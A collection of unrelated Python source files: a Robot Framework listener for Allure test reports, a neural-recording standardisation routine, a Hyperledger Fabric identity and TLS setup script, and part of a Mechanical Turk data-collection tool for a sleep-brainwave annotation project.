# for debugging purpose not needed by application
class AllureListener(object):
ROBOT_LISTENER_API_VERSION = 2
def __init__(self, allurePropPath=None, source='Listener'):
self.stack = []
self.testsuite = None
self.callstack = []
self.AllurePropPath = allurePropPath
self.AllureIssueIdRegEx=''
self.testsuite is None
self.isFirstSuite = True
# Setting this variable prevents the loading of a Library added Listener.
# I case the Listener is added via Command Line, the Robot Context is not
# yet there and will cause an exceptions. Similar section in start_suite.
try:
AllureListenerActive = BuiltIn().get_variable_value('${ALLURE}', false)
BuiltIn().set_global_variable('${ALLURE}', True)
except:
pass
def start_suitesetup(self, name, attributes):
start_test_attributes= {'critical': 'yes',
'doc': 'Test Suite Setup section',
'starttime': attributes['starttime'],
'tags': [],
'id': 's1-s1-t0',
'longname': BuiltIn().get_variable_value('${SUITE_NAME}'),
'template': ''
}
if len(str(start_test_attributes.get('doc'))) > 0:
description = str(start_test_attributes.get('doc'))
else:
description = name
test = TestCase(name=name,
description=description,
start=now(),
attachments=[],
labels=[],
# parameters=[],
steps=[])
self.stack.append(test)
return
def end_suitesetup(self, name, attributes):
end_test_attributes= {'critical': 'yes',
'doc': 'Test Suite Setup section',
'starttime': attributes['starttime'],
'endtime': attributes['endtime'],
'status': 'PASS',
'tags': [],
'id': 's1-s1-t0',
'longname': BuiltIn().get_variable_value('${SUITE_NAME}'),
'template': ''
}
test = self.stack.pop()
BuiltIn().run_keyword(name)
if end_test_attributes.get('status') == Robot.PASS:
test.status = Status.PASSED
elif end_test_attributes.get('status')==Robot.FAIL:
test.status = Status.FAILED
test.failure = Failure(message=end_test_attributes.get('message'), trace='')
elif end_test_attributes.get('doc') is not '':
test.description = attributes.get('doc')
if end_test_attributes['tags']:
for tag in end_test_attributes['tags']:
if re.search(self.AllureIssueIdRegEx, tag):
test.labels.append(TestLabel(
name=Label.ISSUE,
value=tag))
if tag.startswith('feature'):
test.labels.append(TestLabel(
name='feature',
value=tag.split(':')[-1]))
if tag.startswith('story'):
test.labels.append(TestLabel(
name='story',
value=tag.split(':')[-1]))
elif tag in SEVERITIES:
test.labels.append(TestLabel(
name='severity',
value=tag))
elif tag in STATUSSES:
test.status = tag # overwrites the actual test status with this value.
self.PabotPoolId = BuiltIn().get_variable_value('${PABOTEXECUTIONPOOLID}')
if(self.PabotPoolId is not None):
self.threadId = 'PabotPoolId-' + str(self.PabotPoolId)
else:
self.threadId = threading._get_ident()
test.labels.append(TestLabel(
name='thread',
value=str(self.threadId)))
self.testsuite.tests.append(test)
test.stop = now()
return test
def start_test(self, name, attributes):
if len(str(attributes.get('doc'))) > 0:
description = str(attributes.get('doc'))
else:
description = name
test = TestCase(name=name,
description=description,
start=now(),
attachments=[],
labels=[],
steps=[],
severity='normal')
self.stack.append(test)
return
def end_test(self, name, attributes):
# logger.console('\nend_test: ['+name+']')
# logger.console(attributes)
# logger.console(' [stack lenght] ['+str(len(self.stack))+'] [testsuite lenght] ['+ str(len(self.testsuite.tests))+']')
test = self.stack.pop()
if attributes.get('status') == Robot.PASS:
test.status = Status.PASSED
elif attributes.get('status')==Robot.FAIL:
test.status = Status.FAILED
test.failure = Failure(message=attributes.get('message'), trace='')
elif attributes.get('doc') is not '':
test.description = attributes.get('doc')
if attributes['tags']:
for tag in attributes['tags']:
if re.search(self.AllureIssueIdRegEx, tag):
test.labels.append(TestLabel(
name=Label.ISSUE,
value=tag))
elif tag.startswith('feature'):
test.labels.append(TestLabel(
name='feature',
value=tag.split(':')[-1]))
elif tag.startswith('story'):
test.labels.append(TestLabel(
name='story',
value=tag.split(':')[-1]))
elif tag in SEVERITIES:
test.labels.append(TestLabel(
name='severity',
value=tag))
test.severity = tag
elif tag in STATUSSES:
test.status = tag # overwrites the actual test status with this value.
else:
test.labels.append(TestLabel(
name='tag',
value=tag))
self.PabotPoolId = BuiltIn().get_variable_value('${PABOTEXECUTIONPOOLID}')
if(self.PabotPoolId is not None):
self.threadId = 'PabotPoolId-' + str(self.PabotPoolId)
else:
self.threadId = threading._get_ident()
test.labels.append(TestLabel(
name='thread',
value=str(self.threadId)))
self.testsuite.tests.append(test)
test.stop = now()
return test
def start_suite(self, name, attributes):
self.SuitSrc = BuiltIn().get_variable_value('${SUITE_SOURCE}')
self.ExecDir = BuiltIn().get_variable_value('${EXECDIR}')
# Reading the Allure Properties file for the Issue Id regular expression
# for the Issues and the URL to where the Issues/Test Man links should go.
if(self.AllurePropPath is None):
self.AllurePropPath = self.ExecDir + '\\allure.properties'
if os.path.exists(self.AllurePropPath) is True:
self.AllureProperties = AllureProperties(self.AllurePropPath)
self.AllureIssueIdRegEx = self.AllureProperties.get_property('allure.issues.id.pattern')
else:
self.AllureProperties = AllureProperties(self.AllurePropPath)
self.AllureIssueIdRegEx = self.AllureProperties.get_property('allure.issues.id.pattern')
# Not using &{ALLURE} as this is throwing an error and ${ALLURE} gives the
# desired dictionary in Allure as well.
BuiltIn().set_global_variable('${ALLURE}', self.AllureProperties.get_properties())
# When running a Robot folder, the folder itself is also considered a Suite
# The full check depends on the availability of all the vars which are
# only available when a Robot file has started.
IsSuiteDirectory = os.path.isdir(self.SuitSrc)
if(not(IsSuiteDirectory)):
''' Check if class received Output Directory Path in the properties file. '''
if self.AllureProperties.get_property('allure.cli.logs.xml') is None:
''' No Path was provided, so using output dir with additional sub folder. '''
self.allurelogdir = BuiltIn().get_variable_value('${OUTPUT_DIR}') + "\\Allure"
else:
self.allurelogdir = self.AllureProperties.get_property('allure.cli.logs.xml')
self.AllureImplc = AllureImpl(self.allurelogdir)
''' Clear the directory but not if run in parallel mode in Pabot'''
PabotPoolId = BuiltIn().get_variable_value('${PABOTEXECUTIONPOOLID}')
try:
if(self.isFirstSuite == True
and self.AllureProperties.get_property('allure.cli.logs.xml.clear') == 'True'
and PabotPoolId is None):
clear_directory(self.AllureProperties.get_property('allure.cli.logs.xml'))
except Exception as e:
logger.console(pprint.pformat(e))
finally:
self.isFirstSuite = False
if attributes.get('doc') is not '':
description = attributes.get('doc')
else:
description = name
self.testsuite = TestSuite(name=name,
title=name,
description=description,
tests=[],
labels=[],
start=now())
return
def end_suite(self, name, attributes):
self.testsuite.stop = now()
logfilename = '%s-testsuite.xml' % uuid.uuid4()
# When running a folder, the folder itself is also considered a Suite
# The full check depends on the availability of all the vars which are
# only available when a Robot file has started.
IsSuiteDirectory = os.path.isdir(BuiltIn().get_variable_value("${SUITE_SOURCE}"))
if(not(IsSuiteDirectory)):
with self.AllureImplc._reportfile(logfilename) as f:
self.AllureImplc._write_xml(f, self.testsuite)
return
def start_keyword(self, name, attributes):
# logger.console('\nstart_keyword: ['+name+']')
# logger.console(' ['+attributes['type']+'] [stack lenght] ['+str(len(self.stack))+'] [testsuite lenght] ['+ str(len(self.testsuite.tests))+']')
if(hasattr(self, attributes.get('kwname').replace(" ", "_")) and callable(getattr(self, attributes.get('kwname').replace(" ", "_")))):
libraryMethodToCall = getattr(self, attributes.get('kwname').replace(" ", "_"))
result = libraryMethodToCall(name, attributes)
keyword = TestStep(name=name,
title=attributes.get('kwname'),
attachments=[],
steps=[],
start=now(),)
if self.stack:
self.stack.append(keyword)
return keyword
if(attributes.get('type') == 'Keyword' or (attributes.get('type') == 'Teardown' and len(self.stack) is not 0)):
keyword = TestStep(name=name,
title=attributes.get('kwname'),
attachments=[],
steps=[],
start=now(),)
if self.stack:
self.stack.append(keyword)
return keyword
"""
Processing the Suite Setup.
Although there is no test case yet, a virtual one is created to allow
for the inclusion of the keyword.
"""
if(attributes.get('type') == 'Setup' and len(self.stack) == 0):
self.start_suitesetup(name, attributes)
return
if(attributes.get('type') == 'Teardown' and len(self.stack) == 0):
self.start_suitesetup(name, attributes)
return
def end_keyword(self, name, attributes):
# logger.console('\nend_keyword: ['+name+']')
# logger.console(' ['+attributes['type']+'] [stack lenght] ['+str(len(self.stack))+'] [testsuite lenght] ['+ str(len(self.testsuite.tests))+']')
if len(self.stack) > 0:
if(attributes.get('type') == 'Keyword' or (attributes.get('type') == 'Teardown' and isinstance(self.stack[-1], TestStep) is True)):
step = self.stack.pop()
if(attributes.get('status') == 'FAIL'):
step.status = 'failed'
elif(attributes.get('status') == 'PASS'):
step.status = 'passed'
step.stop = now()
# Append the step to the previous item. This can be another step, or
# another keyword.
self.stack[-1].steps.append(step)
return
if(attributes.get('type') == 'Setup' and len(self.testsuite.tests) == 0):
self.end_suitesetup(name, attributes)
return
if(attributes.get('type') == 'Teardown' and isinstance(self.stack[-1], TestCase) is True):
self.end_suitesetup(name, attributes)
return
return
def message(self, msg):
pass
def log_message(self, msg):
# logger.console(pprint.pformat(msg))
# logger.console(self.stack[-1].title)
# Check to see if there are any items to add the log message to
# this check is needed because otherwise Suite Setup may fail.
if len(self.stack) > 0:
if self.stack[-1].title == 'Capture Page Screenshot':
screenshot = re.search('[a-z]+-[a-z]+-[0-9]+.png',msg['message'])
if screenshot:
self.attach('{}'.format(screenshot.group(0)) , screenshot.group(0))
if(msg['html']=='yes'):
screenshot = re.search('[a-z]+-[a-z]+-[0-9]+.png',msg['message'])
kwname = '{}'.format(screenshot.group(0))
# logger.console('kwname: '+kwname)
else:
kwname = msg['message']
startKeywordArgs= {'args': [],
'assign': [],
'doc': '',
'kwname': kwname,
'libname': 'BuiltIn',
'starttime': now(),
'tags': [],
'type': 'Keyword'}
self.start_keyword('Log Message', startKeywordArgs)
endKeywordArgs= {'args': [],
'assign': [],
'doc': '',
'elapsedtime': 0,
'endtime': now(),
'kwname': kwname,
'libname': 'BuiltIn',
'starttime': now(),
'status': 'PASS',
'tags': [],
'type': 'Keyword'}
self.end_keyword('Log Message', endKeywordArgs)
return
def close(self):
IsSuiteDirectory = os.path.isdir(self.SuitSrc)
if(not(IsSuiteDirectory)):
self.save_environment()
# self.save_properties()
self.AllureProperties.save_properties()
if (self.AllureProperties.get_property('allure.cli.outputfiles') and self.PabotPoolId is None):
self.allure(self.AllureProperties)
return
# Helper functions
def save_environment(self):
environment = {}
environment['id'] = 'Robot Framework'
environment['name'] = socket.getfqdn()
environment['url']= 'http://'+socket.getfqdn()+':8000'
env_dict = (\
{'Robot Framework Full Version': get_full_version()},\
{'Robot Framework Version': get_version()},\
{'Interpreter': get_interpreter()},\
{'Python version': sys.version.split()[0]},\
{'Allure Adapter version': VERSION},\
{'Robot Framework CLI Arguments': sys.argv[1:]},\
{'Robot Framework Hostname': socket.getfqdn()},\
{'Robot Framework Platform': sys.platform}\
)
for key in env_dict:
self.AllureImplc.environment.update(key)
self.AllureImplc.logdir = self.AllureProperties.get_property('allure.cli.logs.xml')
self.AllureImplc.store_environment(environment)
def allure(self, AllureProps):
JAVA_PATH= AllureProps.get_property('allure.java.path')
ALLURE_HOME= '-Dallure.home='+AllureProps.get_property('allure.home')
JAVA_CLASSPATH= '-cp "'+ AllureProps.get_property('allure.java.classpath')+'"'
ALLURE_LOGFILE= AllureProps.get_property('allure.cli.logs.xml')
ALLURE_OUTPUT= '-o '+ AllureProps.get_property('allure.cli.logs.output')
JAVA_CLASS= 'ru.yandex.qatools.allure.CommandLine'
ALLURE_COMMAND= 'generate'
ALLURE_URL= AllureProps.get_property('allure.results.url')
allure_cmd = JAVA_PATH + ' ' + ALLURE_HOME + ' ' + JAVA_CLASSPATH + ' ' + JAVA_CLASS + ' ' + ALLURE_COMMAND + ' ' + ALLURE_LOGFILE + ' ' + ALLURE_OUTPUT
if(AllureProps.get_property('allure.cli.outputfiles')=='True'):
FNULL = open(os.devnull, 'w') #stdout=FNULL,
subprocess.Popen(allure_cmd, stderr=subprocess.STDOUT, shell=True).wait()
if(AllureProps.get_property('allure.results.browser.open')=='True'):
webbrowser.open(ALLURE_URL, new=0, autoraise=True)
def attach(self, title, contents, attach_type=AttachmentType.PNG):
"""
This functions created the attachments and append it to the test.
"""
# logger.console("attach-title: "+title)
contents = os.path.join(BuiltIn().get_variable_value('${OUTPUT_DIR}'), contents)
with open(contents, 'rb') as f:
file_contents = f.read()
attach = Attach(source=self.AllureImplc._save_attach(file_contents, attach_type),
title=title,
type=attach_type)
self.stack[-1].attachments.append(attach)
return
def Set_Output_Dir(self, name, attributes):
copy_dir_contents(self.AllureProperties.get_property('allure.cli.logs.xml'), attributes['args'][0])
self.AllureProperties.set_property('allure.cli.logs.xml', attributes['args'][0])
self.AllureImplc.logdir = attributes['args'][0]
|
<gh_stars>0
"""
Recording standarization
"""
import multiprocess
import os.path
from yass.batch import BatchProcessor
from yass.util import check_for_files, ExpandPath, LoadFile
import numpy as np
@check_for_files(filenames=[ExpandPath('output_filename'),
LoadFile('output_filename', 'yaml')],
mode='extract', relative_to='output_path')
def standarize(path_to_data, dtype, n_channels, data_order,
sampling_frequency, max_memory, output_path,
output_dtype, output_filename='standarized.bin',
if_file_exists='skip', processes='max'):
"""
Standarize recordings in batches and write results to disk. Standard
deviation is estimated using the first batch
Parameters
----------
path_to_data: str
Path to recordings in binary format
dtype: str
Recordings dtype
n_channels: int
Number of channels in the recordings
data_order: str
Recordings order, one of ('channels', 'samples'). In a dataset with k
observations per channel and j channels: 'channels' means first k
contiguous observations come from channel 0, then channel 1, and so
on. 'sample' means first j contiguous data are the first observations
from all channels, then the second observations from all channels and
so on
sampling_frequency: int
Recordings sampling frequency in Hz
max_memory: str
Max memory to use in each batch (e.g. 100MB, 1GB)
output_path: str
Where to store the standarized recordings
output_dtype: str
dtype for standarized data
output_filename: str, optional
Filename for the output data, defaults to whitened.bin
if_file_exists: str, optional
One of 'overwrite', 'abort', 'skip'. If 'overwrite' it replaces the
standarized data if it exists, if 'abort' if raise a ValueError
exception if the file exists, if 'skip' if skips the operation if the
file exists
processes: str or int, optional
Number of processes to use, if 'max', it uses all cores in the machine
if a number, it uses that number of cores
Returns
-------
standarized_path: str
Path to standarized recordings
standarized_params: dict
A dictionary with the parameters for the standarized recordings
(dtype, n_channels, data_order)
"""
processes = multiprocess.cpu_count() if processes == 'max' else processes
_output_path = os.path.join(output_path, output_filename)
# init batch processor
bp = BatchProcessor(path_to_data, dtype, n_channels, data_order,
max_memory)
sd = standard_deviation(bp, sampling_frequency)
def divide(rec):
return np.divide(rec, sd)
# apply transformation
(standarized_path,
standarized_params) = bp.multi_channel_apply(divide,
mode='disk',
output_path=_output_path,
cast_dtype=output_dtype,
processes=processes)
return standarized_path, standarized_params
def standard_deviation(batch_processor, sampling_frequency,
preprocess_fn=None):
"""Estimate standard deviation using the first batch in a large file
"""
# read a batch from all channels
batches = batch_processor.multi_channel()
first_batch = next(batches)
if preprocess_fn:
first_batch = preprocess_fn(first_batch)
# estimate standard deviation using the first batch
sd = _standard_deviation(first_batch, sampling_frequency)
return sd
def _standard_deviation(rec, sampling_freq):
"""Determine standard deviation of noise in each channel
Parameters
----------
rec : matrix [length of recording, number of channels]
sampling_freq : int
the sampling rate (in Hz)
Returns
-------
sd : vector [number of channels]
standard deviation in each channel
"""
# if the size of recording is long enough, only get middle 5 seconds of
# data
small_t = np.min((int(sampling_freq*5), rec.shape[0]))
mid_T = int(np.ceil(rec.shape[0]/2))
rec_temp = rec[int(mid_T-small_t/2):int(mid_T+small_t/2)]
# find standard deviation using robust method
sd = np.median(np.abs(rec_temp), 0)/0.6745
return sd
|
# Copyright 2018 Owkin, inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
from subprocess import call
from utils.setup_utils import registerIdentities, registerUsers, generateGenesis, enrollWithFiles, genTLSCert, writeFile
from utils.common_utils import create_directory
SUBSTRA_PATH = os.getenv('SUBSTRA_PATH', '/substra')
def generateMSPandTLS(node, org, msp_dir, admincerts=False):
##################################################################################################################
# Although a peer may use the same TLS key and certificate file for both inbound and outbound TLS, #
# we generate a different key and certificate for inbound and outbound TLS simply to show that it is permissible #
##################################################################################################################
# Node peer/orderer mounted volume, see docker_utils 'Client/Server TLS' binded volume.
tls_setup_dir = node['tls']['dir']['external']
# create external folders (client and server)
tls_server_dir = os.path.join(tls_setup_dir, node['tls']['server']['dir'])
tls_client_dir = os.path.join(tls_setup_dir, node['tls']['client']['dir'])
# Generate server TLS cert and key pair in container
genTLSCert(node, org,
cert_file=os.path.join(tls_server_dir, node['tls']['server']['cert']),
key_file=os.path.join(tls_server_dir, node['tls']['server']['key']),
ca_file=os.path.join(tls_server_dir, node['tls']['server']['ca']))
# Generate client TLS cert and key pair for the peer CLI (will be used by external tools)
# in a binded volume
genTLSCert(node, org,
cert_file=os.path.join(tls_client_dir, node['tls']['client']['cert']),
key_file=os.path.join(tls_client_dir, node['tls']['client']['key']),
ca_file=os.path.join(tls_client_dir, node['tls']['client']['ca']))
# Enroll the node to get an enrollment certificate and set up the core's local MSP directory for starting node
enrollWithFiles(node, org, msp_dir, admincerts=admincerts)
def init_org(conf, enrollmentAdmin):
for peer in conf['peers']:
setup_peer_msp_dir = os.path.join(conf['core_dir']['internal'], peer['name'], 'msp')
generateMSPandTLS(peer, conf, setup_peer_msp_dir, admincerts=False)
# copy the admincerts from the admin user for being able to install chaincode
# https://stackoverflow.com/questions/48221810/what-is-difference-between-admincerts-and-signcerts-in-hyperledge-fabric-msp
# https://lists.hyperledger.org/g/fabric/topic/17549225#1250
# https://github.com/hyperledger/fabric-sdk-go/blob/master/internal/github.com/hyperledger/fabric/msp/mspimpl.go#L460
# https://jira.hyperledger.org/browse/FAB-3840
admin = conf['users']['admin']
filename = os.path.join(setup_peer_msp_dir, 'admincerts', '%s-cert.pem' % admin['name'])
writeFile(filename, enrollmentAdmin._cert)
def init_orderer(conf):
for orderer in conf['orderers']:
setup_orderer_msp_dir = os.path.join(conf['core_dir']['internal'], orderer['name'], 'msp')
# copy the admincerts from the user for being able to launch orderer
generateMSPandTLS(orderer, conf, setup_orderer_msp_dir, admincerts=True)
def init(conf, enrollmentAdmin):
if 'peers' in conf:
init_org(conf, enrollmentAdmin)
if 'orderers' in conf:
init_orderer(conf)
create_directory(conf['broadcast_dir']['external'])
generateGenesis(conf)
if __name__ == '__main__':
conf = json.load(open(f'{SUBSTRA_PATH}/conf.json', 'r'))
registerIdentities(conf)
enrollmentAdmin = registerUsers(conf)
init(conf, enrollmentAdmin)
print('Finished setup', flush=True)
call(['touch', conf['misc']['setup_success_file']])
|
# -*- coding: utf-8 -*-
# coding=utf-8
__author__ = 'ben'
import os
from os import walk
import boto.mturk.connection
from boto.s3.connection import S3Connection
from boto.mturk.qualification import LocaleRequirement, Qualifications, Requirement
import datetime
import csv
import yaml
import sys
import datetime
import pandas as pd
import codecs
from pprint import pprint
sandbox_host = 'mechanicalturk.sandbox.amazonaws.com'
real_host = 'mechanicalturk.amazonaws.com'
host = os.environ['MODA_MTURK_HOST']
hosts={
'sandbox':'mechanicalturk.sandbox.amazonaws.com',
'real':'mechanicalturk.amazonaws.com'
}
phasesQualID = {
'sandbox': {
'practice': '3LJ6LLBDMBQTWUTLG75O5EUQMZM6A6',
'phase1': '3OFCXZK7I1YMQQ45Q5LPJ2OOHCHK93'
},
'real': {
'practice': '3EOSKS3N0DQYQTMKNK1E0HHQOWRVU1',
'phase1': '3874R5DF6Q5C7TEUP9O1NNJXLRMPJ6'
}
}
myWorkerID = {
'sandbox': 'A2SI2XQA7HPR8V',
'real': 'A2SI2XQA7HPR8V'
}
testingQual = '35NJKTSSL0Z7GHLPTM145UTQ6PFZXY'
class MturkTools:
"""Tools for mturk"""
def __init__(self):
self.phase = 'phase1experts4'
self.expert_only = True
self.phase_to_save = {'phase1'}
self.date_str = datetime.date.today().isoformat()
self.path = '/mnt/c/Users/bdyet/GoogleDrive/MODA/DownloadUserData/'
if not os.path.exists(self.path+self.phase):
os.makedirs(self.path+self.phase)
self.url = "https://shrouded-plains-8041.herokuapp.com/"
self.mturk = boto.mturk.connection.MTurkConnection(
aws_access_key_id=os.environ['AWS_ACCESS_KEY_ID'],
aws_secret_access_key=os.environ['AWS_SECRET_ACCESS_KEY'],
host=hosts[host],
debug=1 # debug = 2 prints out all requests.
)
self.titles_to_remove = ['Find patterns in sleeping brainwaves (Training HIT)', 'Find patterns in sleeping brainwaves']
print("Welcome to mturk tools, your balance is:")
accountBal = self.mturk.get_account_balance() # [$10,000.00]
print(accountBal)
if self.phase=='sandbox' and accountBal[0] != '10,000.00':
print('Error, your meant to be in sandbox but you are not!')
sys.exit()
def get_all_user_data_from_aws(self):
s3 = S3Connection(os.environ['AWS_ACCESS_KEY_ID'], os.environ['AWS_SECRET_ACCESS_KEY'])
bucket = s3.get_bucket('moss-assets')
bucket_list = bucket.list()
i=0
for l in bucket_list:
key_string = str(l.key)
if self.expert_only:
str2check = 'UserData_expert'
else:
str2check = 'UserData'
if key_string.find(str2check) != -1:
print('Downloading ' + key_string)
l.get_contents_to_filename(self.path+self.phase + '/' +key_string)
i += 1
print("%i user data files downloaded" % i)
def parse_aws_to_csv(self):
mypath = self.path+self.phase + '/'
for (dirpath, dirnames, filenames) in walk(mypath):
break
with open(mypath+'EventLocations' + self.date_str + '.csv', 'w') as event_loc_csv_file:
event_loc_csv_writer = csv.writer(event_loc_csv_file)
event_loc_csv_writer.writerow(['filename',
'phase',
'subID',
'epochNum',
'blockNum',
'annotatorID',
'MODA_batchNum',
'annotatorEventIndex',
'startPercent',
'durationPercent',
'startSecs',
'durationSecs',
'scoreConfidence',
'TimeWindowFirstShown',
'TimeMarkerCreated',
'TimeMarkerLastModified',
'turkHitId',
'turkAssignmentId'])
with open(mypath+'EpochViews' + self.date_str + '.csv', 'w') as epoch_csv_file:
epoch_csv_writer = csv.writer(epoch_csv_file)
epoch_csv_writer.writerow(['filename',
'epochNum',
'blockNum',
'phase',
'annotatorID',
'hitId',
'assignmentId'])
with open(mypath+'UserStats' + self.date_str + '.csv', 'w') as user_stats_csv_file:
user_stats_csv_writer = csv.writer(user_stats_csv_file)
user_stats_csv_writer.writerow(['userName',
'email',
'fname',
'lname',
'userType',
'userSubType',
'totalSetsScored',
'totalEpochsScored',
'totalMarkersScored',
'RPSGT',
'yearsExperience',
'spindleHoursOverLifetime',
'whyQualified',
'otherComments'])
for userFile in filenames: # collate markers, and collate batches
try:
if not (userFile.find('UserData') > -1):
continue
with open(mypath + '/' + userFile) as userFileHandle:
if userFile == "UserData_preview":
continue
user_data = yaml.safe_load(userFileHandle)
try:
if 'userName' not in user_data:
continue
print("working on user %s" % user_data['userName'])
dataExists = False
epochs_complete = 0
markers_complete = 0
except:
print(userFile)
for phase in user_data['batches']:
if phase not in self.phase_to_save:
continue
sets_comp = user_data['setsCompleted'][phase]
print(" Sets completed in {0}: {1}".format(phase, sets_comp))
for batch in user_data['batches'][phase]:
if batch == 'batchMeta':
continue
for img in user_data['batches'][phase][batch]['imgs']:
img_data = user_data['batches'][phase][batch]['imgs'][img]
if len(img_data['markers']) > 0 or img_data['noMarkers'] == 'true' or ('mturkInfo' in img_data):
dataExists = True
epochs_complete += 1
if user_data['userType'] == 'mturker':
assignment_id = img_data['mturkInfo']['assignmentId']
hit_id = img_data['mturkInfo']['hitId']
else:
hit_id = None
assignment_id = None
epoch_csv_writer.writerow([img_data['filename'],
img_data['epoch'],
img_data['batch'],phase,
user_data['userName'],
hit_id,
assignment_id])
for marker in img_data['markers']:
if marker['gs'] == 'true' or marker['deleted'] == 'true':
continue
markers_complete += 1
event_loc_csv_writer.writerow([img_data['filename'],
phase,
img_data['subID'],
img_data['epoch'],
img_data['batch'],
user_data['userName'],
batch,
marker['markerIndex'],
marker['xP'],
marker['wP'],
marker['xSecs'],
marker['wSecs'],
marker['conf'],
marker['imgFirstShown'],
marker['markerCreated'],
marker['timeStamp'],
hit_id,
assignment_id])
if not dataExists:
print("ERROR, %s has a file but did not complete any images. " % user_data['userName'])
except:
print("Massive Error somewhere with {0}".format(user_data['userName']))
if user_data['userType'] == 'mturker':
user_subtype = None
rpsgt = None
email = None
years_experience = None
spindle_hours_over_lifetime = None
why_qualified = None
other_comments = None
else:
email = user_data['registerData']['email']
other_comments = user_data['registerData']['comments']
if 'RPSGTNum' in user_data['registerData']:
user_subtype = 'psgTech'
rpsgt = user_data['registerData']['RPSGTNum']
years_experience = user_data['registerData']['yearsExperience']
spindle_hours_over_lifetime = None
why_qualified = None
elif 'other' in user_data['registerData']:
user_subtype = 'other'
why_qualified = user_data['registerData']['other']
rpsgt = None
years_experience = user_data['registerData']['yearsExperience']
spindle_hours_over_lifetime = user_data['registerData']['timeWorked']
else:
user_subtype = 'researcher'
spindle_hours_over_lifetime = user_data['registerData']['timeWorked']
rpsgt = None
years_experience = user_data['registerData']['yearsExperience']
why_qualified = None
if spindle_hours_over_lifetime is not None:
try:
spindle_hours_over_lifetime = unicode(spindle_hours_over_lifetime.strip(codecs.BOM_UTF8),'utf-8')
except:
spindle_hours_over_lifetime = 'conversion error'
if why_qualified is not None:
try:
why_qualified = unicode(why_qualified.strip(codecs.BOM_UTF8), 'utf-8')
except:
why_qualified = 'conversion error'
if other_comments is not None:
try:
other_comments = unicode(other_comments.strip(codecs.BOM_UTF8), 'utf-8')
except:
other_comments = 'conversion error'
if 'fname' in user_data:
fname = user_data['fname']
else:
fname = 'missing'
if 'lname' in user_data:
lname = user_data['lname']
else:
lname = 'missing'
user_stats_csv_writer.writerow([user_data['userName'],
email,
fname,
lname,
user_data['userType'],
user_subtype,
sets_comp,
epochs_complete,
markers_complete,
rpsgt,
years_experience,
spindle_hours_over_lifetime,
why_qualified,
other_comments])
user_stats_csv_file.close()
epoch_csv_file.close()
event_loc_csv_file.close()
def save_mturk_data(self):
hits = self.get_all_reviewable_hits()
try:
workerResultData = pd.read_csv(self.path+self.phase + "/WorkerResultData.csv", sep=',')
except:
workerResultData = pd.DataFrame(columns={'workerId', 'viewedImgs', 'numViewed', 'numHits', 'browser'})
for hit in hits:
assignments = self.mturk.get_assignments(hit.HITId)
for assignment in assignments:
print("Answers of the worker %s" % assignment.WorkerId)
for answer in assignment.answers:
for idx, ans in enumerate(answer):
if idx == 2:
for viewedImg in ans.fields:
browser = viewedImg
print(browser)
elif idx == 3:
for viewedImg in ans.fields:
print(viewedImg)
viewedImg = viewedImg.split(',')
if len(viewedImg)<1 or viewedImg==None:
print("Missing DATA for {0}".format(assignment.WorkerId))
print(viewedImg)
continue
if assignment.WorkerId not in workerResultData['workerId'].values:
ser = pd.Series([assignment.WorkerId, viewedImg, len(viewedImg), 1, browser], index=['workerId','viewedImgs','numViewed','numHits','browser'])
workerResultData = workerResultData.append(ser, ignore_index=True)
else:
currentData = workerResultData.loc[workerResultData['workerId']==assignment.WorkerId, 'viewedImgs']
currentNumViewed = workerResultData.loc[workerResultData['workerId']==assignment.WorkerId, 'numViewed']
currentNumHits = workerResultData.loc[workerResultData['workerId']==assignment.WorkerId, 'numHits']
if not set(viewedImg).issubset(currentData.values[0]):
currentDataValue = currentData.values[0]
if isinstance(currentDataValue, basestring):
currentDataValue = currentDataValue.split(',')
workerLoc = workerResultData['workerId']==assignment.WorkerId
currentDataValue.extend(viewedImg)
workerResultData.loc[workerLoc, 'viewedImgs'] = [currentDataValue]
workerResultData.loc[workerLoc, 'numViewed'] = currentNumViewed+len(viewedImg)
workerResultData.loc[workerLoc, 'numHits'] = currentNumHits+1
workerResultData.to_csv(self.path+self.phase + "/WorkerResultData.csv")
def get_all_reviewable_hits(self):
page_size = 50
hits = self.mturk.get_reviewable_hits(page_size=page_size)
print("Total results to fetch %s " % hits.TotalNumResults)
print("Request hits page %i" % 1)
total_pages = float(hits.TotalNumResults)/page_size
int_total = int(total_pages)
if total_pages - int_total > 0:
total_pages = int_total+1
else:
total_pages = int_total
pn = 1
while pn < total_pages:
pn += 1
print("Request hits page %i" % pn)
temp_hits = self.mturk.get_reviewable_hits(page_size=page_size,page_number=pn)
hits.extend(temp_hits)
return hits
def get_all_hits(self):
return self.mturk.get_all_hits()
def approve_hits(self):
reviewable_hits = self.get_all_reviewable_hits()
for hit in reviewable_hits:
assignments = self.mturk.get_assignments(hit.HITId)
for assignment in assignments:
print("Worker %s" % assignment.WorkerId)
try:
self.mturk.approve_assignment(assignment.AssignmentId)
except:
print("already approved")
print("--------------------")
self.mturk.disable_hit(hit.HITId)
def disable_all_hits(self):
allHits = self.mturk.get_all_hits()
for hit in allHits:
if hit.Title in self.titles_to_remove:
print('deleting')
self.mturk.disable_hit(hit.HITId)
def dispose_reviewed_hits(self):
allHits = self.mturk.get_all_hits()
for hit in allHits:
if hit.Title in self.titles_to_remove:
print('disposing')
self.mturk.dispose_hit(hit.HITId)
def expire_remaining_hits(self):
allHits = self.mturk.get_all_hits()
for hit in allHits:
if hit.Title in self.titles_to_remove:
print('expiring {0}'.format(hit.Title))
self.mturk.expire_hit(hit.HITId)
def remove_qualifications(self, phase_type, workers_to_remove='me'):
if workers_to_remove != 'me':
qual_data= self.mturk.get_all_qualifications_for_qual_type(phasesQualID[host][phase_type])
workers = []
for worker in qual_data:
workers.append(worker.SubjectId)
else:
workers = [myWorkerID[host]]
for workerID in workers:
try:
self.mturk.revoke_qualification(workerID, phasesQualID[host][phase_type], reason='Granted in error')
except:
print('worker %s does not have qual' % workerID)
def post_prac_hits(self, num_hits, amount, testing=False):
title = "Find patterns in sleeping brainwaves (Training HIT)"
description = "This is a training hit which will grant you a qualification to complete more HITs." \
"Expected HIT completion time is 12mins (because you have to read instructions etc)," \
" BUT future HITs will be shorter!!!" \
"Your job is to find patterns in recordings of the sleeping brain! Help science understand " \
"sleep and its memory benefits. \n" \
"This project is run by the MODA team at University of California, Riverside." \
